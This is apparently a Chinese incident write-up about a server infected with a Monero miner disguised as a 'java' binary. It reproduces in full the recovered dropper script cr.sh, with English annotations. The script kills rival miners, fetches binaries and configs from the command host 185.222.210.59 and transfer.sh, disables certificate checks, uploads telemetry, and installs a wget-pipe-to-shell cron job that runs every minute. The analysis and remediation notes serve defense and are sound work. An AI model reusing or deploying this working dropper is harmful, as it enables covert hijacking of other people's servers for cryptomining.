30号的时候,发现服务器CPU占用暴涨!
cpu 一直满载
很好奇(我心里一直在想,哪个坑逼代码里面写了 while(true); 之类的究极操作)
31号:
今天登录上去一看,
首先top
然后看到一个进程的CPU占用飙升到了400%
很惊讶,怎么会飙升到400%,难道是某个java进程出了娄子?
然后执行 ps -ef|grep 13221
发现它仅仅是一个名字叫 java 的文件而已,感觉有点像病毒!
然后我们百度了一下 /var/tmp/java -c /var/tmp/w.conf
最终发现这个帖子
https://zhangnew.com/hadoop-yarn-safe.html
初步确定是病毒
首先它具有以下特征
1.文件删除了,它又会重新出现
2.CPU占用基本高达100%
后续是通过 crontab -l
发现它是通过
#* * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1
这行代码实现
然后我们找到了 http://185.222.210.59/cr.sh
哼哼!!
期间也用过 tcpdump 去检测 IP,但没啥作用,无奈 IP 太多,极其麻烦!
附录:
cr.sh 脚本,大家好好看看它是干嘛的
#!/bin/bash
# ---- Analyst annotations (cr.sh as recovered from the crontab in the write-up) ----
# This script is what the cron entry
#   * * * * * wget -q -O - http://185.222.210.59/cr.sh | sh
# fetches and runs every minute, so every stage below is written to be
# re-run repeatedly: it re-asserts its files, its process and its cron entry.
# Indicators that appear on this page: payload/C2 host 185.222.210.59, a
# dropped binary named "java" under /tmp or /var/tmp, its config "w.conf",
# a cached copy named "ppl3", and the two MD5 values treated as "known good".
#
# Stage 1: evict competing miners by command-line pattern. xmrig and
# xmr-stak are public Monero miners; the other names are presumably rival
# droppers (inferred from the names only).
pkill -f cryptonight
pkill -f sustes
pkill -f xmrig
pkill -f xmr-stak
pkill -f suppoie
# Kill anything launched with "config.json -t" on its command line.
ps ax | grep "config.json -t" | grep -v grep | awk '{print $1}' | xargs kill -9
# Kill other variants using wc/wq/wm/wt.conf together with ppl/pscf/ppc/ppp
# names. This script's own "w.conf" does not match the first pattern, so it
# does not kill itself here.
ps ax | grep 'wc.conf\|wq.conf\|wm.conf\|wt.conf' | grep -v grep | grep 'ppl\|pscf\|ppc\|ppp' | awk '{print $1}' | xargs kill -9
# Remove a rival's dropped files.
rm -rf /var/tmp/pscf*
rm -rf /tmp/pscf*
# Stage 2: choose the working directory DIR.
#   /tmp        - default, used when /tmp/java is a writable regular file
#   /var/tmp    - when /tmp/java does not exist (this is why the write-up
#                 found /var/tmp/java -c /var/tmp/w.conf)
#   mktemp dir  - when /tmp/java exists but is not a writable file
DIR="/tmp"
if [ -a "/tmp/java" ]
then
if [ -w "/tmp/java" ] && [ ! -d "/tmp/java" ]
then
if [ -x "$(command -v md5sum)" ]
then
# Compare the existing binary's MD5 with the two expected hashes. On a
# mismatch the running miner is killed (matched on its w.conf argument) so
# downloadIfNeed can replace it later in the script.
sum=$(md5sum /tmp/java | awk '{ print $1 }')
echo $sum
case $sum in
183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
echo "Java OK"
;;
*)
echo "Java wrong"
pkill -f w.conf
sleep 4
;;
esac
fi
echo "P OK"
else
# /tmp/java exists but is not a writable regular file (e.g. a directory put
# there as a blocker): relocate to a random temp dir instead of giving up.
DIR=$(mktemp -d)/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
else
# /tmp/java is absent: prefer /var/tmp as the drop location.
if [ -d "/var/tmp" ]
then
DIR="/var/tmp"
fi
echo "P NOT EXISTS"
fi
# Second guard with the same effect: a directory at /tmp/java only moves the
# dropper to a fresh temp dir. Creating that directory is not a mitigation.
if [ -d "/tmp/java" ]
then
DIR=$(mktemp -d)/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
# Downloader selection: wget wins when both curl and wget are installed.
# Both forms are later swapped for variants that skip TLS verification
# (see downloadIfNeed).
WGET="wget -O"
if [ -s /usr/bin/curl ];
then
WGET="curl -o";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget -O";
fi
# Host reused throughout for w.conf, re.php, g.php and the cron re-fetch.
f2="185.222.210.59"
# Ensure $DIR/java exists and matches one of the two expected MD5s.
# Flow: file missing -> download; hash mismatch -> wipe and re-download
# (local cache ppl3 first via download, then the network), and as a last
# resort fetch an alternate copy from transfer.sh; then report the outcome
# to the operator via http://$f2/re.php.
# Globals: reads DIR, WGET, f2; rewrites WGET to its no-TLS-verify form.
# Side effects: writes $DIR/java, $DIR/ppl3, $DIR/tmp.txt; outbound HTTP
# to transfer.sh and to 185.222.210.59 (a curl -F file upload).
downloadIfNeed()
{
if [ -x "$(command -v md5sum)" ]
then
# No binary at all: go straight to the download path.
if [ ! -f $DIR/java ]; then
echo "File not found!"
download
fi
sum=$(md5sum $DIR/java | awk '{ print $1 }')
echo $sum
case $sum in
183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
echo "Java OK"
;;
*)
echo "Java wrong"
# Record the size of the unexpected file for the report sent below.
sizeBefore=$(du $DIR/java)
# Switch the global downloader to ignore certificate errors (curl -k /
# wget --no-check-certificate); this also affects later $WGET uses.
if [ -s /usr/bin/curl ];
then
WGET="curl -k -o ";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget --no-check-certificate -O ";
fi
# Truncate the report file, delete the bad binary, and re-fetch.
echo "" > $DIR/tmp.txt
rm -rf $DIR/java
download
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/java | awk '{ print $1 }')
echo $sum
case $sum in
183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
echo "Java OK"
# Good copy: refresh the local cache used by download().
cp $DIR/java $DIR/ppl3
;;
*)
# Fallback source: an ephemeral file-sharing URL, captured into tmp.txt.
$WGET $DIR/java https://transfer.sh/rKCkr/zzz > $DIR/tmp.txt 2>&1
echo "Java wrong"
sum=$(md5sum $DIR/java | awk '{ print $1 }')
case $sum in
183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
echo "Java OK"
cp $DIR/java $DIR/ppl3
;;
*)
echo "Java wrong2"
;;
esac
;;
esac
else
echo "No md5sum"
fi
# Telemetry: append before/after hashes and sizes to tmp.txt and upload it
# to re.php on the C2 host. An outbound HTTP POST to 185.222.210.59 from a
# server is a usable detection signal for this stage.
sumAfter=$(md5sum $DIR/java | awk '{ print $1 }')
if [ -s /usr/bin/curl ];
then
echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/java` >> $DIR/tmp.txt
curl -F "file=@$DIR/tmp.txt" http://$f2/re.php
fi
;;
esac
else
# Without md5sum nothing can be verified, so the script just downloads.
echo "No md5sum"
download
fi
}
# Restore $DIR/java from the local cache $DIR/ppl3 when the cache's MD5
# matches one of the expected values; otherwise (or when md5sum is absent)
# fetch from the network via download2.
# Globals: reads DIR. Side effect: overwrites $DIR/java.
# Response note: ppl3 is the persistent copy — deleting only "java" leaves
# this cache in place and the next cron run copies it straight back.
download() {
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/ppl3 | awk '{ print $1 }')
echo $sum
case $sum in
183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
echo "Java OK"
cp $DIR/ppl3 $DIR/java
;;
*)
echo "Java wrong"
download2
;;
esac
else
echo "No md5sum"
download2
fi
}
# Fetch the miner binary from the network.
#   1. Ask 185.222.210.59/g.php for the current payload host (curl, then
#      wget as fallback) so the binary can come from a host not hard-coded
#      in this script. If both return nothing, $f1 is empty and the URL
#      below degrades to "http:///xm64", i.e. the download fails.
#   2. Pick the 32- or 64-bit build (xm32/xm64) from getconf LONG_BIT;
#      $RANDOM is appended as a cache-buster.
#   3. Verify the MD5 and, on success, cache a copy as $DIR/ppl3.
# Globals: reads DIR, WGET; sets f1 (not local). Writes $DIR/java, $DIR/ppl3.
download2() {
f1=$(curl 185.222.210.59/g.php)
if [ -z "$f1" ];
then
f1=$(wget -q -O - 185.222.210.59/g.php)
fi
if [ `getconf LONG_BIT` = "64" ]
then
$WGET $DIR/java http://$f1/xm64?$RANDOM
else
$WGET $DIR/java http://$f1/xm32?$RANDOM
fi
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/java | awk '{ print $1 }')
echo $sum
case $sum in
183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
echo "Java OK"
cp $DIR/java $DIR/ppl3
;;
*)
echo "Java wrong"
;;
esac
else
echo "No md5sum"
fi
}
# Launch stage: run only when no process already has both '/tmp/java' and
# 'w.conf' on its command line. The match is a substring match, so a miner
# running as /var/tmp/java (the case in the write-up) is also recognised.
if [ ! "$(ps -fe|grep '/tmp/java'|grep 'w.conf'|grep -v grep)" ];
then
downloadIfNeed
chmod +x $DIR/java
# The miner config is fetched from the C2 host, the binary is started
# detached with all output discarded, and w.conf is deleted 5 seconds later.
# During response do not expect w.conf on disk; it is more likely to be
# recovered from the running process or from a network capture.
$WGET $DIR/w.conf http://$f2/w.conf
nohup $DIR/java -c $DIR/w.conf > /dev/null 2>&1 &
sleep 5
rm -rf $DIR/w.conf
else
echo "Running"
fi
# Persistence: install a once-a-minute cron entry that re-fetches this
# script (the exact line quoted at the top of the write-up). Because it
# re-runs every minute, remediation must remove the cron line, stop the
# process, AND delete both $DIR/java and $DIR/ppl3; otherwise the next run
# restores the binary from the cache. Check the crontab of the account the
# dropper ran as for the string 185.222.210.59.
if crontab -l | grep -q "185.222.210.59"
then
echo "Cron exists"
else
echo "Cron not found"
LDR="wget -q -O -"
if [ -s /usr/bin/curl ];
then
LDR="curl";
fi
if [ -s /usr/bin/wget ];
then
LDR="wget -q -O -";
fi
(crontab -l 2>/dev/null; echo "* * * * * $LDR http://185.222.210.59/cr.sh | sh > /dev/null 2>&1")| crontab -
fi
# Cleanup of rivals: kill processes and strip crontab entries that belong to
# other campaigns (logo*.jpg names, the 192.99.142.x hosts). These are
# additional indicators worth checking for on the same host.
pkill -f logo4.jpg
pkill -f logo0.jpg
pkill -f logo9.jpg
pkill -f jvs
pkill -f javs
pkill -f 192.99.142.248
rm -rf /tmp/pscd*
rm -rf /var/tmp/pscd*
crontab -l | sed '/192.99.142.232/d' | crontab -
crontab -l | sed '/192.99.142.226/d' | crontab -
crontab -l | sed '/192.99.142.248/d' | crontab -
crontab -l | sed '/logo4/d' | crontab -
crontab -l | sed '/logo9/d' | crontab -
crontab -l | sed '/logo0/d' | crontab -